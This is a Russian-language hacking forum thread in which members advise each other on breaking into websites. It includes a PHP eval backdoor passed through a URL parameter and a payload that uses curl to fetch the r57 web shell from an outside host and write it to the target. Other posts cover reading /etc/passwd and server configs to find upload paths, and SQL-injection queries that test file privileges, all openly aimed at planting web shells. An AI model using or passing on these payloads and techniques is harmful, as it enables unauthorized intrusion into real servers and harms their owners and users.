Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    набудующее от кавычек stripslashes ,eval(stripslashes($_GET[e]))

    а в твое случае попробуй имятвоего_скрипта.php?e=eval(stripslashes($_GET[a]))&a=ну и тут твой код с кавычками
     
    _________________________
  2. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    Перекодирует браузер, нужно использовать тулзу, которая отправляет сырой запрос,
    в простейшем случае - telnet, много инструментов более удобных. Не трудно отправить курлом.
    На форуме была программа.
     
  3. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    158
    Likes Received:
    1
    Reputations:
    -10
    собственно записал в фак комплит
    eval(stripslashes($_GET[e]));
    но чето всёравно не получается(
    вот какой код использую
    Code:
    e=system('curl http://www.sh3ll.org/r57.txt > 23.php');
     
    #19583 Cherep, 4 Mar 2012
    Last edited: 4 Mar 2012
  4. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    напиши в пм домен....уверен что папка на запись досутпна?
     
    _________________________
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    Пару вопросов,
    сижу в phpmyadmin с правами рут
    где в настройках изменить max_allowed_packet


    и второй вопрос, в пвпке etc/passwd нашол нужного мне узверя

    bla-user:x:500:505:bla-user:/var/www/bla-user/data:/bin/date\

    каким будет полный путь к файлам исходя из етого?
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    "max_allowed_packet" менять надо в my.ini

    второй вопрос не правильно составил, что это за юзер? и что означает полный путь к файлам? и к каким файлам?
     
    _________________________
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    полный путь к файлам на хостинге, чтобы шелл залить
     
  8. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605

    если я тебя правильно понял то ищи конфиг http.conf там тебе и будет путь
     
    _________________________
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    чёт не могу конфинг откопать

    всё что перепробовал
    как ещо бывает?
     
  10. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    ты уверен что там apache вообще? смотри какая система стоит (@@version_compile_os, или по баннерам сервера)

    дальше ищи в гугле, где в данной системе конфиги хранятся
     
    _________________________
  11. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    проверил, система линукс
    нашол под неё конфиги
    http://microsin.ru/content/view/542/1/

    подобного http.conf я ненашол, или я плохо искал?
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    qaz, в разных дистрибутивах конфиги хранятся в разных каталогах. на эту тему можно флудить на 100 страниц, читайте и практикуйтесь.
     
    _________________________
  13. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    https://forum.antichat.ru/thread49775.html

    http://wiki.apache.org/httpd/DistrosDefaultLayout

    ищи логи в них тоже могут быть пути....какая верси пхпмуадмина? может там есть баги на раскрытие путей
     
    _________________________
  14. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Доброй ночи, ачат. Есть одна скуля. Есть полный доступ к структуре БД information_schema уязвимого ресурса. Как узнать аналог file_priv если мы говорим об information_schema?

    Погуглив, увидел приблизительный ответ на свой вопрос.

    select grantee from information_schema.user_privileges where privilege_type='FILE' and is_grantable='YES'

    Но что делать, если в таблице user_privileges вообще нет поля 'FILE'? Каким еще тестовым запросом можно определить свои права для работы с файлами? Означает ли отсутствие 'FILE' как отсутствие каких-либо прав с работой над файлами вообще?

    Сильно не смейтесь, это не мой профиль, просто попросили помочь :3
     
  15. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    select file_priv from mysql.user

    или что тебе конкретно нужно, ты опиши

    ты хочешь узнать права юзвера мускула? тогда запрос я тебе написал, или что тебе нужно?
     
    _________________________
    1 person likes this.
  16. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Спасибо за ответ.

    БД "mysql" отсутствует вообще. Есть только information_schema. Да, мне нужно узнать, существует ли возможность узнать аналог select file_priv from mysql.user для information_schema.

    Как-то так, в общем.
     
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    лично я не знаю, я так понимаю ты хочешь через скулю залить шелл да?
     
    _________________________
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    если коротко то, нету доступа к базе mysql - нету прав на чтение/запись файлов.

    в information_schema не хранится информация о правах, так что не ищи дальше.
     
    _________________________
  19. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Да, именно. Пока что, исходя из тех данных, к которым я имею доступ, хочу попытаться в первую очередь попробовать залить шелл. Вот я и пытаюсь узнать свои права. Но не знаю как определить в information_schema свои права при условии отсутствия поля "FILE" в таблице USER_PRIVILEGES.
     
  20. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    329
    Likes Received:
    177
    Reputations:
    76
    Ясно, понял. Учту на будущее. Спасибо. И, безусловно, жаль, что дело принимает такой оборот. Ладно, попробуем поискать обходные пути.
     
Thread Status:
Not open for further replies.